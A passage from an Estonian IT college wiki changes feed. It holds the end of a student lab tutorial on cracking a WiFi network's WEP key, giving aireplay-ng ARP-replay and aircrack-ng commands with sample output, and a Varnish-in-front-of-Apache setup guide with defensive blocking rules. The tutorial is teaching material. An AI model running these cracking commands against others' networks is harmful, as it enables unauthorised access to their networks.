18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Varnish&amp;diff=89349</id>
		<title>Varnish</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Varnish&amp;diff=89349"/>
		<updated>2015-05-25T20:57:54Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: Tammsaare pisarad.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!--&lt;br /&gt;
Järgnev siin kommentaaris pole otseselt oluline informatsioon, artiklit täiendanud isikute kohta informatsiooni saab lehe muudatuste ajaloost&lt;br /&gt;
= Kaasajastas Lauri-Rihard Liba, 2015, A21 =&lt;br /&gt;
= Koostajad = &lt;br /&gt;
&lt;br /&gt;
 Vajab täiendamist. Lingi http://blog.rac.me.uk/2009/11/29/linux-handy-varnish-commands/ alusel. &lt;br /&gt;
 See link on kahjuks kõvasti aegunud ja puudub täielik info, mis Varnishi versiooni jaoks ja mis poolte nende käskluste taga silmas peeti.&lt;br /&gt;
&lt;br /&gt;
Rene Sepp, Kersti Lang, Carolys Kallas&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Varnish&#039;&#039;&#039; kasutatakse veebilehekülgede kiirendamiseks. Teenus installeeritakse HTTP serveri ette ning tehakse vastavad muutused sisu puhverdamiseks.&lt;br /&gt;
&lt;br /&gt;
Varnish tavaliselt kiirendab andmete laadimist 300-1000 korda sõltuvalt veebilehe ülesehitusest. Varnish Cache hoiab veebilehti vahemälus kiirendades sellega javaskriptide ning piltide laadimist. Lisaks kasutatakse seda ka koormuse tasakaalustamiseks ning turvalisuse suurendamiseks.&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/about About Varnish]&amp;lt;/ref&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Ajalugu==&lt;br /&gt;
Projekti algatas Norra suurim tabloidformaadis ajaleht Verdens Gang&amp;lt;ref&amp;gt;[https://www.varnish-software.com/use-case/vg-norway VG (Norway)| Varnish Software]&amp;lt;/ref&amp;gt;. Arhitekt ja juhtiv arendaja on Taani konsultant Poul-Henning Kamp (tuntud kui FreeBSDcore arendaja).&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/trac/wiki/ArchitectNotes Notes from the Architect]&amp;lt;/ref&amp;gt; Varnish Cache tugi, haldus ja arendus koondus hiljem eraldi haruks - Varnish Software&amp;lt;ref&amp;gt;[https://www.varnish-software.com/about-us About Us | Varnish Software]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Varnishi versioon 1.0 avalikustati aastal 2006&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2006-September/000638.html Varnish 1.0 released]&amp;lt;/ref&amp;gt;, Varnish 2.0 aastal 2008&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2008-October/000010.html Varnish 2.0 released]&amp;lt;/ref&amp;gt;, Varnish 3.0 aastal 2011&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2011-June/000670.html Varnish 3.0.0 released]&amp;lt;/ref&amp;gt; ja Varnish 4.0 aastal 2014&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2014-April/000696.html Varnish 4.0.0 released]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Arhitektuur==&lt;br /&gt;
Varnish Cache salvestab andmed virtuaalmällu ja jätab otsustada, mis salvestatakse mällu ja mida suunatakse ketta operatsioonisüsteemi. See aitab vältida olukorda, kus operatsioonisüsteem hakkab andmeid suunama vahemällu samal ajal kui nad paigutatakse rakenduse poolt kettale.&lt;br /&gt;
&lt;br /&gt;
Lisaks on Varnishi tugevalt &amp;quot;keermestatud&amp;quot;, iga kliendi ühendust käsitletakse kui eraldi &amp;quot;keeret&amp;quot;. Kui seadistatud aktiivsete &amp;quot;keerete&amp;quot; arv on täidetud, paigutatakse sisenevad ühendused ülevoolu järjekorda. Kui kui see järjekord jõuab teatud piirini, hakkab süsteem sissetulevaid ühendusi tagasi lükkama.&lt;br /&gt;
&lt;br /&gt;
Peamine seadistamise mehhanism on VCL (Varnishi Configuration Language). Enamus kasutajapoliitika otsuseid jäetakse VCL koodi, mis muudab Varnishi palju rohkem seadistatavaks ja kohanemisvõimelisemaks kui enamik teisi HTTP kiirendeid. Kui VLC skript on laetud, tõlgitakse see &amp;quot;C&amp;quot; keelde, kompileeritakse, et jagada objektid süsteemi poolt kompilaatorisse ja seotakse otse kiirendiga.&lt;br /&gt;
&lt;br /&gt;
Arvu run-time parameetrid kontrollivad näiteks maksimaalset ja minimaalset aktiivsete keerete arvu, nende erinevaid süsteemipause jne. Käsurea juhtimise liides võimaldab neid parameetreid muuta, uusi VCL skripte kompileerida, laadida ja aktiveerida kiirendile taaskäivitust tegemata.&lt;br /&gt;
&lt;br /&gt;
Selleks, et vähendada süsteemi päringute arvu kiirelt miinimumini, on logi-andmed salvestatud mällu ning logi-andmete filtreerimine, vorminine ning kirjutamine aktiivsele kettale kettale.&amp;lt;ref&amp;gt;[https://en.wikipedia.org/wiki/Varnish_%28software%29#Architecture Varnish(software) Wikipedia]&amp;lt;/ref&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Varnishi paigaldamine turvalisuse suurendamiseks==&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Hoiatus: &#039;&#039;&#039;Antud installatsiooni lahendus on testitud Ubuntu 14.04.2 LTS peal, kuid võib toimida muudel Debianil baseeruvate distributsioonide peal. Muude distributsioonide peal paigaldamiseks tasub uurida arendaja kodulehekülge&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/releases Varnish Releases]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Eelduseks on töötav veebileht, näiteks [[Veebiserveri_labor|Apache]] vaikeleht või WordPressi leht. Kui seda tehtud pole, siis seda kirjeldab [[WordPress_turvamine|WordPress turvamise labor]].&amp;lt;/div&amp;gt;&lt;br /&gt;
Järgneva juhendi&amp;lt;ref&amp;gt;[https://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian Putting Varnish In Front Of Apache On Ubuntu/Debian]&amp;lt;/ref&amp;gt; abil on võimalik sättida Varnish ülesse nii, et mitte-täielikud HTTP päringud püütakse kinni Varnishi teenuse poolt. Esialgne juhend on kohandatud uuema Varnishi versiooni ja Ubuntu väljalaske jaoks.&lt;br /&gt;
&lt;br /&gt;
===Apache konfigureerimine===&lt;br /&gt;
Apache2 tuleb kuulama panna localhosti, selleks on vaja &amp;lt;code&amp;gt;/etc/apache2/ports.conf&amp;lt;/code&amp;gt; konfiguratsioonifailis muuta vaikimisi kuulatav port 80 pealt 8080 peale.&lt;br /&gt;
&lt;br /&gt;
 Listen 8080&lt;br /&gt;
&lt;br /&gt;
Järgmisena tuleb muuta virtualhosti failis olev kuulatav port.&lt;br /&gt;
Siin näites kasutame Apache2 vaikelehe konfiguratsioonifaili &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-default.conf&amp;lt;/code&amp;gt;, kus tuleb muuta vaikimisi kuulatav port 80 meile vajalikuks port 8080 peale. Seda saab teha manuaalselt tekstiredaktoriga, kuid kui on vaja mitu faili muuta, siis on mõtekas kasutusele võtta käsurea utiliit [[sed]]&lt;br /&gt;
&lt;br /&gt;
 cd /etc/apache2/sites-available&lt;br /&gt;
 sed &#039;s/:80/:8080/&#039; 000-default.conf -i&lt;br /&gt;
&lt;br /&gt;
Hetkeseisuga on konfiguratsioon selline, et Varnish saab kirjeid Apachelt ja külastajate IP addressiks logitakse lokaalse masina IP.&lt;br /&gt;
Selle parandamiseks paigaldame Apachele lisamooduli, et kuvataks kliendi õige ip aadress: &lt;br /&gt;
&lt;br /&gt;
 apt-get install libapache2-mod-rpaf&lt;br /&gt;
&lt;br /&gt;
===Varnish Paigaldus===&lt;br /&gt;
Kuna Varnishi repositoorium&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/installation/ubuntu Installation on Ubuntu]&amp;lt;/ref&amp;gt; on turvalisel http kanalil, siis on vaja laiendada apt utiliiti, et see oleks võimeline tõlgendama https:// aadresse, kui vastav laiendus pole paigaldatud, siis saab selle Ubuntus installeerida järgnevalt:&lt;br /&gt;
&lt;br /&gt;
 apt-get install apt-transport-https&lt;br /&gt;
&lt;br /&gt;
Lisame Varnishi repositooriumi krüptovõtme, et apt oleks suuteline autentima repositooriumist alla laetavaid faile:&lt;br /&gt;
&lt;br /&gt;
 curl &amp;lt;nowiki&amp;gt;https://repo.varnish-cache.org/GPG-key.txt&amp;lt;/nowiki&amp;gt; | apt-key add -&lt;br /&gt;
&lt;br /&gt;
Lisame Varnishi repositooriumi Ubuntu 14.04 Trusty Tahr jaoks oma apt utiliidi allikate loendisse:&lt;br /&gt;
&lt;br /&gt;
 echo &amp;quot;deb &amp;lt;nowiki&amp;gt;https://repo.varnish-cache.org/ubuntu/ trusty varnish-4.0&amp;lt;/nowiki&amp;gt;&amp;quot; &amp;gt;&amp;gt; /etc/apt/sources.list.d/varnish-cache.list&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi ja paigaldame Varnishi:&lt;br /&gt;
&lt;br /&gt;
 apt-get update &amp;amp;&amp;amp; apt-get install varnish&lt;br /&gt;
&lt;br /&gt;
===Varnishi konfiguratsiooni muutmine===&lt;br /&gt;
Muudame Varnishi konfiguratsioonifaili &amp;lt;code&amp;gt;/etc/default/varnish&amp;lt;/code&amp;gt;, et Varnish kuulaks vaikimisi port 80 ja muudame VCL faili asukohta. Siin näites on kasutusele võetud &amp;lt;code&amp;gt;/etc/varnish/meieleht.vcl&amp;lt;/code&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
DAEMON_OPTS=&amp;quot;-a :80 \&lt;br /&gt;
             -T localhost:6082 \&lt;br /&gt;
             -f /etc/varnish/meieleht.vcl \&lt;br /&gt;
             -S /etc/varnish/secret \&lt;br /&gt;
             -s malloc,256m&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Kopeerime vcl struktuuri vaikefailist &amp;lt;code&amp;gt;default.vcl&amp;lt;/code&amp;gt; uude faili &amp;lt;code&amp;gt;meieleht.vcl&amp;lt;/code&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
 cp /etc/varnish/default.vcl /etc/varnish/meieleht.vcl&lt;br /&gt;
&lt;br /&gt;
Täiendame faili &amp;lt;code&amp;gt;meieleht.vcl&amp;lt;/code&amp;gt;, et tõsta Apache turvalisust Varnishi abiga.&lt;br /&gt;
&amp;lt;&amp;lt;!-- Note style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #DDDDFF; border: thin solid #BBBBDD; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Märge: &#039;&#039;&#039;Esialgne juhend kasutas Varnish 2.1, mille süntaks erineb natukene Varnish 4.0.3 omast. &amp;lt;ref&amp;gt;[https://www.varnish-cache.org/docs/trunk/whats-new/upgrade-4.0.html Süntaksi muudatused versioon Varnish 4.0 versioonis]&amp;lt;/ref&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sub vcl_recv {&lt;br /&gt;
    # Add a unique header containing the client address.&lt;br /&gt;
    unset req.http.X-Forwarded-For;&lt;br /&gt;
    set req.http.X-Forwarded-For = client.ip;&lt;br /&gt;
    # Added security, the &amp;quot;w00tw00t&amp;quot; attacks are pretty annoying so let&#039;s block&lt;br /&gt;
    # it before it reaches our webserver.&lt;br /&gt;
    if (req.url ~ &amp;quot;^/w00tw00t&amp;quot;) {&lt;br /&gt;
        return (synth(403, &amp;quot;Not permitted&amp;quot;));&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
sub vcl_backend_response {&lt;br /&gt;
    # Remove the X-Forwarded-For header if it exists.&lt;br /&gt;
    unset bereq.http.X-Forwarded-For;&lt;br /&gt;
&lt;br /&gt;
    # Insert the client IP address as X-Forwarded-For.&lt;br /&gt;
    # This is the normal IP address of the user.&lt;br /&gt;
    set bereq.http.X-Forwarded-For = bereq.http.rlnclientipaddr;&lt;br /&gt;
&lt;br /&gt;
    # Deliver the content&lt;br /&gt;
    return (deliver);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
sub vcl_deliver {&lt;br /&gt;
    # We&#039;ll be hiding some headers added by Varnish. We want to make sure people&lt;br /&gt;
    # are not seeing that we are using Varnish.&lt;br /&gt;
    # Since we&#039;re not caching (yet), why bother telling people we are using it?&lt;br /&gt;
    unset resp.http.X-Varnish;&lt;br /&gt;
    unset resp.http.Via;&lt;br /&gt;
    unset resp.http.Age;&lt;br /&gt;
    # We&#039;d like to hide the X-Powered-By headers. Nobody has to know we can run&lt;br /&gt;
    # PHP and have version XYZ of it.&lt;br /&gt;
    unset resp.http.X-Powered-By;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Deemonite restart===&lt;br /&gt;
Kõigepealt tuleb taaskäivitada Apache teenus:&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Järgnevalt kontrollime netstat utiliidiga, kas Apache kuulab meie poolt konfigureeritud porti:&lt;br /&gt;
&lt;br /&gt;
 netstat -lp | grep apache2&lt;br /&gt;
&lt;br /&gt;
Tulemus peab olema taoline:&lt;br /&gt;
&lt;br /&gt;
 tcp        0      0 localhost:8080          *:*                     LISTEN      4586/apache2&lt;br /&gt;
&lt;br /&gt;
Taaskäivitame Varnishi teenuse:&lt;br /&gt;
&lt;br /&gt;
 service varnish restart&lt;br /&gt;
&lt;br /&gt;
Kontrollime, kas Varnishi teenus kuulab õigelt pordilt:&lt;br /&gt;
&lt;br /&gt;
 netstat -lp | grep varnish&lt;br /&gt;
&lt;br /&gt;
Tulemus peab olema taoline:&lt;br /&gt;
&lt;br /&gt;
 tcp        0      0 *:www                   *:*                     LISTEN      4498/varnishd&lt;br /&gt;
 tcp6       0      0 [::]:www                [::]:*                  LISTEN      4498/varnishd&lt;br /&gt;
&lt;br /&gt;
Varnish on ka võimeline kuulama pealt ipv6.&lt;br /&gt;
&lt;br /&gt;
Nüüd on Varnish paigaldatud Apache2 ette ja sait peab nüüd töötama. Kui Apache2 peatada, kuvatakse Varnish veateate lehekülg.&lt;br /&gt;
&lt;br /&gt;
==Logimine==&lt;br /&gt;
Veebilehe külastamisi saab jälgida &amp;lt;code&amp;gt;/var/log/varnish/access.log&amp;lt;/code&amp;gt; logifailist.&lt;br /&gt;
===Detailsemate logide konfigureerimine===&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Hoiatus: &#039;&#039;&#039;Järgnev sektsioon on vabatahtlik. Kui oled siiani järginud juhendit siis on sul Apache2+Varnish konfigureeritud ja toimiv ning edasi pole vaja konfigureerida aine IT Infrastruktuuride raames.&amp;lt;/div&amp;gt;&lt;br /&gt;
Vaikimisi kuvatakse Apache logides serveri aadressi asemel kliendi addres. Kuna kliendi asemel suhtleb Apache veebiserveriga Varnish, mis on lokaalse masina peal siis see tähendab, et logifailides kuvatakse iga kirje puhul serveri enda aadressi.&lt;br /&gt;
&amp;lt;ref&amp;gt;[http://willjackson.org/blog/configure-vanish-forward-client-ip-addresses-apache-logs Configure Varnish to forward client ip addresses in Apache logs]&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;!--&amp;lt;ref&amp;gt;[http://webcache.googleusercontent.com/search?q=cache:eR2P_eWyRjoJ:theyusedtocallitablog.net/2011/07/configuring-varnish-and-apache-to-pass-the-original-client-ip-specifically-with-wordpress-comments-in-mind/+&amp;amp;cd=1&amp;amp;hl=en&amp;amp;ct=clnk&amp;amp;gl=ee&amp;amp;client=ubuntu Configuring varnish and apache to pass the original client ip]&amp;lt;/ref&amp;gt;--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====VCL faili reeglid====&lt;br /&gt;
Lisada oma Varnish konfiguratsiooni .vcl read:&lt;br /&gt;
Näiteks failis &amp;lt;code&amp;gt;/etc/varnish/meieleht.vcl&amp;lt;/code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sub vcl_recv {&lt;br /&gt;
    # Rename the incoming XFF header to work around a Varnish bug.&lt;br /&gt;
    if (req.http.X-Forwarded-For) {&lt;br /&gt;
        # Append the client IP&lt;br /&gt;
        set req.http.X-Real-Forwarded-For = req.http.X-Forwarded-For &amp;quot;, &amp;quot; regsub(client.ip, &amp;quot;:.*&amp;quot;, &amp;quot;&amp;quot;);&lt;br /&gt;
        unset req.http.X-Forwarded-For;&lt;br /&gt;
    } else {&lt;br /&gt;
        # Simply use the client IP&lt;br /&gt;
        set req.http.X-Real-Forwarded-For = regsub(client.ip, &amp;quot;:.*&amp;quot;, &amp;quot;&amp;quot;);&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Apache pool==== &lt;br /&gt;
Konfigureerime Apache uut logimisformaati kasutama käsklusega, mis loob faili &amp;lt;code&amp;gt;varnish-log&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 echo &#039;LogFormat &amp;quot;%{X-Forwarded-For}i %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b \&amp;quot;%{Referer}i\&amp;quot; \&amp;quot;%{User-Agent}i\&amp;quot;&amp;quot; varnishcombined&#039; &amp;gt; /etc/apache2/conf.d/varnish-log&lt;br /&gt;
&lt;br /&gt;
Samuti tuleb iga virtualhosti (nt. &amp;lt;code&amp;gt;000-default.conf&amp;lt;/code&amp;gt;) logiformaadi rea puhul ülesse leida sõna &amp;lt;code&amp;gt;combined&amp;lt;/code&amp;gt; ja asendada see sõnaga &amp;lt;code&amp;gt;varnishcombined&amp;lt;/code&amp;gt;, selleks kasutame jällegi utiliiti sed:&lt;br /&gt;
&lt;br /&gt;
 cd /etc/apache2/sites-available/&lt;br /&gt;
 sed &#039;s/combined/varnishcombined/&#039; 000-default.conf -i&lt;br /&gt;
&lt;br /&gt;
Vahepealseks etapiks on teenuste taaskäivitamine:&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart &amp;amp;&amp;amp; service varnish restart&lt;br /&gt;
&lt;br /&gt;
Siis tuleb virtualhostid välja ja sisse lülitada:&lt;br /&gt;
&lt;br /&gt;
 a2dissite 000-default.conf n2ide.conf n2ide3.conf&lt;br /&gt;
 a2ensite 000-default.conf n2ide.conf n2ide3.conf&lt;br /&gt;
&lt;br /&gt;
====Tulemuse kontroll====&lt;br /&gt;
Ühenda kliendiga veebiserveri külge ja vaata Apache2 &amp;lt;code&amp;gt;access.log&amp;lt;/code&amp;gt; faili, mis ip logitakse kui külastada veebilehte.&lt;br /&gt;
&lt;br /&gt;
 tail /var/log/apache2/access.log&lt;br /&gt;
&lt;br /&gt;
==Security.VCL paigaldamine==&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Hoiatus: &#039;&#039;&#039;Järgnev sektsioon on vabatahtlik. Kui oled siiani järginud juhendit siis on sul Apache2+Varnish konfigureeritud ja toimiv ning edasi pole vaja konfigureerida aine IT Infrastruktuuride raames.&amp;lt;/div&amp;gt;&lt;br /&gt;
Security.vcl on Web Application tulemüür, mis on rakendatud vcl(Varnish Control Language) keeles.&amp;lt;ref&amp;gt;[https://github.com/comotion/security.vcl/blob/master/README Security.vcl README]&amp;lt;/ref&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Oma funktsiooni poolest sarnaneb [[mod_security]]le, aga on rakendatud teistmoodi.&lt;br /&gt;
&lt;br /&gt;
Esimese sammuna tuleks paigaldada vajalikud utiliidid kompileerimiseks:&lt;br /&gt;
&lt;br /&gt;
 apt-get install git make&lt;br /&gt;
&lt;br /&gt;
Siis tuleks kloonida [[git]]i repositooriumis olev algmaterjal:&lt;br /&gt;
&lt;br /&gt;
 git clone &amp;lt;nowiki&amp;gt;https://github.com/comotion/security.vcl.git&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Järgmiste sammudena on vaja repositooriumis olev rakendus paigaldada ja luua sümboolne link Varnishi konfiguratsiooni kausta:&lt;br /&gt;
&lt;br /&gt;
 cd security.vcl/vcl/&lt;br /&gt;
 sudo make&lt;br /&gt;
 cd ..&lt;br /&gt;
 sudo ln -s $PWD/vcl/ /etc/varnish/security&lt;br /&gt;
&lt;br /&gt;
Lisa Varnishi .vcl conf faili järgnev rida &amp;lt;code&amp;gt;backend default&amp;lt;/code&amp;gt; koodiploki alla:&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/varnish/security/main.vcl&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Välja peaks nägema nii:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
backend default {&lt;br /&gt;
        .host = &amp;quot;127.0.0.1&amp;quot;;&lt;br /&gt;
        .port = &amp;quot;8080&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
include &amp;quot;/etc/varnish/security/main.vcl&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Taaskäivita Varnishi teenus:&lt;br /&gt;
&lt;br /&gt;
 service varnish restart&lt;br /&gt;
&lt;br /&gt;
===Tulemuse kontroll===&lt;br /&gt;
Proovi nüüd minna enda veebiserveri külge aadressiga:&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://&amp;lt;sinu serveri ip&amp;gt;/javascript:&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
Kui kõik toimib, tuleb vastuseks:&lt;br /&gt;
 Error 403 Naughty, not nice!&lt;br /&gt;
&lt;br /&gt;
==Kokkuvõte==&lt;br /&gt;
Varnishi abil on võimalik suht triviaalselt täiendada oma veebiserveri kiirust, mis on tänapäeval kindlasti üks väga tähtis korraliku veebiteenuse loomisel.&lt;br /&gt;
&lt;br /&gt;
Kui pisut süveneda VCL süntaksisse ja väga loetavasse dokumentatsiooni&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/docs Varnish Docs]&amp;lt;/ref&amp;gt; on võimalik ilma lisa programmideta, nagu näiteks [[modsecurity]], tuua sisse tulemüüri funktsioone. Kindlasti tasub uurida ka Varnishi enda wikit&amp;lt;ref&amp;gt;[https://www.varnish-cache.org/trac/ Varnish wiki]&amp;lt;/ref&amp;gt;, kust võib leida ka VCL näitefaile, mida on rakendatud &#039;&#039;production&#039;&#039; süsteemides, mille pealt tasub šnitti võtta.&lt;br /&gt;
&lt;br /&gt;
==Viited==&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89344</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89344"/>
